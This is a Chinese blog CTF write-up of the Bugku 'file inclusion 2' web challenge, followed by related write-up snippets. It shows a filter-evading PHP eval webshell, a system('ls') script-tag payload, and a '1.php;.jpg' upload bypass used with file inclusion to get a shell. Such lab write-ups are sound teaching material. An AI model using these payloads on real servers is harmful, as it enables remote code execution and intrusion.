Bugku ctf writeup--web篇-文件包含2

最新推荐文章于 2024-09-15 22:13:37 发布
最新推荐文章于 2024-09-15 22:13:37 发布
阅读量675 收藏
点赞数
原文链接:https://blog.csdn.net/qq_33417843/article/details/79756682
版权

Step1:查看源码

发现注释文件upload.php,访问下来到文件上传页面


Step2:上传一句话

普通一句话会被过滤,这里构造<?=eval($_POST['shell']);>

保存文件修改后缀为1.php;.jpg,成功上传

根据提示是文件包含,直接访问文件路径无效,菜刀无法连接

包含文件进行访问是空白页面,再进行菜刀连接


Step3:上菜刀

发现一个文件名很长的txt文件,打开就是flag

 

另一种思路是简书上看到的,在这里也po出来以供参考

在php文件里写入<script language=php>system("ls")</script>,列当前目录

同理,修改后缀名为jpg,如1.php;.jpg,上传成功

访问直接可以看到flag文件

包含或者直接访问都可以得到flag



bylfsj
关注
专栏目录
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
[bugku]-文件包含2
weixin_52116519的博客
03-31 1125
考点:通过文件包含的方式读取其他目录下的文件按 1、查看源码,发现hint 2、文件上传点 3、上传1.png文件,抓包,修改内容为一句话木马 4、访问上传文件名,发现有过滤 5、绕过过滤,上传一句话木马 6、访问上传文件名,输出a,说明上传成功。接着getshell即可。 ...
bugku-web-文件包含2
qq_75121443的博客
04-14 479
啧啧啧,怎么说呢,这题出的挺诡异的,本来是考文件包含,结果不伦不类。这里试探结束,开始配合文件包含漏洞,上传图片。上传一个脚本,将图片后缀改为php。这就很离谱,上传的一句话居然用不了。提示是这个文件,访问这个文件。测试后后台为linux系统。各种绕过手法使用后无法绕过。上传成功,文件包含后发现。看到了第一行有一个注释。
CTF-BugKu-web shell
最新发布
qq_51145360的博客
09-15 368
访问目标地址,可以发现是一个空白页根据描述中说的马,最后是($_GET[‘s’]),所以应该是传入一个s参数发现whoami执行成功了,接下来看下都有什么文件找找flag在哪里查看这个flag什么什么的文件成功得到flag!BugKu_shell_bugku shell-CSDN博客。打开场景后,发现啥也没有。,URL中传入一个s参数。
BugKuCTF套路满满的题--------文件包含2
qq_42133828的博客
12-24 1737
首先讲一下这道题的思路,文件包含,什么是文件包含?其实简单来说就是通过一个文件传入参数(构造语句)去访问另一个文件,从而得到你所想要的东西。 然而,这道题,除了文件包含的知识。还涉及到了文件上传的知识。毕竟,这两者总是相互存在在。。。。。 好了,接下来,开始解题: 首先进入的界面是一个欢迎界面,看URL里的参数得有一个参数file,查看源码可得有upload.php这个文件存在,那么改一下f...
bugku-文件包含2:文件包含与一句话木马配合使用
weixin_51646864的博客
09-07 622
题目:bugku文件包含2 题目采取了后端过滤,而且还将php语言的格式开头过滤了 绕过php的语言格式头试一下 1、查看源码,找到文件上传点 2、创建图片马上传, 利用file变量包含文件,是使jpg文件以php执行 最后用蚁剑连接上图url地址即可
Bugku Web CTF-文件包含2
No Title
12-31 478
Bugku Web CTF-文件包含2 打开是一个页面,题目提示是文件包含,url的格式也很典型: http://123.206.31.85:49166/index.php?file=hello.php 尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass,然后页面显示大字NA...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-writeup-crawler:CTF撰写的检索器
04-27
ctf-writeup-crawler CTF撰写的检索器 请确保已在配置了以下内容的计算机上安装并运行PostgreSQL 确保有一个名为ctfcrawler的数据库 确保有一个postgres用户/密码:ctfcrawler / ctfcrawler 该程序是在Eclipse ...
bugku-文件包含2(文件包含漏洞)
烟敛寒林的博客
11-09 2839
本文介绍三种方法,还会讲到这道题菜刀的连接。 进入题目页面,没有什么特别的,只能右键查看源代码,发现提示需要跳转到 upload.php上传页面 方法一: ①新建一个txt文件写入 <script language=php>system("ls")</script> 后另存为 jpg 格式 ②选择浏览上传文件 ③访问 保存进去的文...
bugku-文件包含2 writeup
Peithon的博客
04-30 4190
文件包含2 flag格式:SKCTF{xxxxxxxxxxxxxxxx} hint:文件包含 1.访问http://118.89.219.210:49166/查看源代码 2.将hello.php改成upload.php,访问 这里对上传的文件的格式和大小做了限制 3.上传一个图片马,burpsuite抓包改后缀为.php上传失败 4.这对文件的后缀也做了限制,%00截断不...
bugku 文件包含2
Superpig的博客
11-20 1220
分析 1、打开题目链接,发现url为http://123.206.31.85:49166/index.php?file=hello.php很明显的字眼file 2、然后看一下源代码,发现一个event,意思是按一下b会重定向到Bookmark Page,结果尝试了发现是骗人的。。 3、首先尝试改url为 ?file=php://filter/read=convert.base64-encode/r...
bugku web 文件上传2
m0_58189778的博客
08-19 554
题目:bugku 文件包含2 知识点:文件包含 工具:中国剑蚁 解题: 点开链接: 有点小炫酷的动画,除此之外没有什么信息,看一下源码: 发现注释中隐藏的upload.php,与题目的文件上传吻合了,现在思考怎么使用这个文件名,是直接访问还是如同默认页面一样,在file后传入文件名: 这里我们选择后者,比较幸运,成功了: 查看源码也并无玄机,看来应该到了上传文件的时候了。 文件上传通常需要我们做的是,上传一个恶意php脚本,然后我直接访问或者...
BugkuCTF-WEB-文件包含2
烟雨天青色
08-13 1218
解题链接:http://123.206.31.85:49166 打开题目链接,发现url变成了http://123.206.31.85:49166/index.php?file=hello.php很明显的文件包含字眼file,之后我们来看一下网页源代码 我们可以发现网页源代码里面有一个event,不过没什么用,我们在源代码最上方可以看到一行注释写着upload.php,我们尝试访问一下...
四十、BUGKU文件包含2
山兔的博客
09-13 272
打开网站没有看到什么东西,F12看到网站的html,在其中很明显有着一行代码,upload.php,我们有理由怀疑是文件上传。在查看一下源代码, view-source:http://114.67.246.176:12173/ index.php?file=hello.php ,没发现什么有意思的东西。 换一个域名访问,http://114.67.246.176:12173/index.php?file=upload.php,发现是一个文件上传的网站。 上传一句话木马的.jpg图片,内容为<?php
bugkuctf 文件包含2 writeup
wuerror的博客
08-07 1594
  首先看网页源代码,发现 访问upload.php,进入上传页面。     要求上传图片,开始构造一句话图片马。因为初学,一句话不太熟只知道 &lt;?php @eval($_post[a]);?&gt;   把这句话加在图片(改为txt格式)的最后,再改回jpg。上传之后访问该图的存储路径,发现post数据没有反应。显示出来的我的"一句话"语句好像两头被转义了。想了好久不知道怎么办,...
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值